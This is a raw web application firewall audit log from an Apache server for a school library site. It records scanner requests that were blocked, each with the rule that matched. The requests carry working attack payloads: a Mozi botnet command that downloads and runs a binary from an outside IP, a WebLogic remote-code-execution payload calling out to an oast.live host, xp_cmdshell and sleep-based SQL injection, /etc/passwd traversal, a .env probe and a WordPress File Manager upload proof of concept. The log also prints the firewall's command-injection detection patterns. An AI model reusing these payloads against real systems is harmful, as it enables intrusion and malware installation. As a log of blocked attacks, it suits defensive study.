perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166166917 --4f5e035e-C-- cH --4f5e035e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f5e035e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748306737037218 3582 (- - -) Stopwatch2: 1748306737037218 3582; combined=2491, p1=562, p2=1855, p3=23, p4=25, p5=25, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f5e035e-Z-- --a6cb9934-A-- [27/May/2025:07:45:37 +0700] aDULMRLFq2VRfSzm6b8PbwAAAI8 103.236.140.4 51104 103.236.140.4 8181 --a6cb9934-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587720 --a6cb9934-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --a6cb9934-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: 
close Content-Type: text/html; charset=iso-8859-1 --a6cb9934-E-- --a6cb9934-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737409621 3711 (- - -) Stopwatch2: 1748306737409621 3711; combined=2508, p1=401, p2=2079, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6cb9934-Z-- --ea47c226-A-- [27/May/2025:07:53:13 +0700] aDUM-RLFq2VRfSzm6b8PhgAAAIA 103.236.140.4 51184 103.236.140.4 8181 --ea47c226-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70846122 --ea47c226-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea47c226-E-- --ea47c226-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307193114429 1626 (- - -) Stopwatch2: 1748307193114429 1626; combined=508, p1=361, p2=121, p3=0, p4=0, p5=26, sr=111, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea47c226-Z-- --e5828635-A-- [27/May/2025:08:00:51 +0700] aDUOwxLFq2VRfSzm6b8PmQAAAIs 103.236.140.4 51270 103.236.140.4 8181 --e5828635-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160587777 --e5828635-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5828635-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307651104339 2903 (- - -) Stopwatch2: 1748307651104339 2903; combined=1025, p1=468, p2=523, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5828635-Z-- --895ed643-A-- [27/May/2025:08:02:21 +0700] aDUPHd6cNBpj1JOkpQlMTAAAAEM 103.236.140.4 51316 103.236.140.4 8181 --895ed643-B-- POST /userentry?accountId=/../../../tomcat/webapps/SuEn4/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587807 --895ed643-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --895ed643-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --895ed643-E-- --895ed643-H-- Message: Access denied with code 403 (phase 2). 
Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307741122204 2905 (- - -) Stopwatch2: 1748307741122204 2905; combined=1524, p1=322, p2=1182, p3=0, p4=0, p5=20, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --895ed643-Z-- --d9090355-A-- [27/May/2025:08:25:01 +0700] aDUUbWTuEZUBy5rh0sZ80AAAAAM 103.236.140.4 51528 103.236.140.4 8181 --d9090355-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166167069 --d9090355-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9090355-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309101328036 2238 (- - -) Stopwatch2: 1748309101328036 2238; combined=737, p1=384, p2=330, p3=0, p4=0, p5=22, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9090355-Z-- --00a4b02d-A-- [27/May/2025:08:25:44 +0700] aDUUmN6cNBpj1JOkpQlMTwAAAE4 103.236.140.4 51556 103.236.140.4 8181 --00a4b02d-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70846134 --00a4b02d-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0q9cd1gpeook7mlf7sganubhfsocwaph.oast.live'-- --00a4b02d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --00a4b02d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748309144101934 4451 (- - -) Stopwatch2: 1748309144101934 4451; combined=2784, p1=556, p2=2134, p3=30, p4=35, p5=29, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00a4b02d-Z-- --a44d936c-A-- [27/May/2025:08:25:45 +0700] aDUUmVuSH_Spa4YU2Zmq0AAAAMw 103.236.140.4 51588 103.236.140.4 8181 --a44d936c-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792077 --a44d936c-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a44d936c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a44d936c-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309145119445 2447 (- - -) Stopwatch2: 1748309145119445 2447; combined=1377, p1=348, p2=1000, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a44d936c-Z-- --b7da256d-A-- [27/May/2025:08:25:57 +0700] aDUUpVuSH_Spa4YU2Zmq1AAAANA 103.236.140.4 51616 103.236.140.4 8181 --b7da256d-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://91.166.59.96:42412/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.166.59.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.166.59.96 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --b7da256d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7da256d-E-- --b7da256d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://91.166.59.96:42412/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://91.166.59.96:42412/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309157475270 2068 (- - -) Stopwatch2: 1748309157475270 2068; combined=616, p1=411, p2=176, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7da256d-Z-- --009f465b-A-- [27/May/2025:08:44:27 +0700] aDUY-96cNBpj1JOkpQlMWgAAAE0 103.236.140.4 51758 103.236.140.4 8181 --009f465b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.254.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.254.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --009f465b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --009f465b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748310267171866 842 (- - -) Stopwatch2: 1748310267171866 842; combined=390, p1=348, p2=0, p3=0, p4=0, p5=41, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --009f465b-Z-- --d4b0331c-A-- [27/May/2025:08:46:13 +0700] aDUZZd6cNBpj1JOkpQlMXwAAAEo 103.236.140.4 51776 103.236.140.4 8181 --d4b0331c-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0qa44pgpeoi1bmoheagho8gyhjmxxrx1.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760116 --d4b0331c-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --d4b0331c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4b0331c-E-- --d4b0331c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310373397443 2308 (- - -) Stopwatch2: 1748310373397443 2308; combined=788, p1=427, p2=328, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4b0331c-Z-- --c515b562-A-- [27/May/2025:08:46:13 +0700] aDUZZWTuEZUBy5rh0sZ83QAAABU 103.236.140.4 51778 103.236.140.4 8181 --c515b562-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169021452 --c515b562-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --c515b562-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c515b562-E-- --c515b562-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310373397763 4213 (- - -) Stopwatch2: 1748310373397763 4213; combined=2791, p1=379, p2=2386, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c515b562-Z-- --2c71206f-A-- [27/May/2025:08:46:13 +0700] aDUZZd6cNBpj1JOkpQlMYAAAAFU 103.236.140.4 51788 103.236.140.4 8181 --2c71206f-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162463834 --2c71206f-C-- cH --2c71206f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c71206f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748310373414500 3054 (- - -) Stopwatch2: 1748310373414500 3054; combined=2001, p1=396, p2=1531, p3=20, p4=30, p5=23, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c71206f-Z-- --8f29f305-A-- [27/May/2025:08:46:14 +0700] aDUZZhLFq2VRfSzm6b8PxwAAAI4 103.236.140.4 51802 103.236.140.4 8181 --8f29f305-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169021458 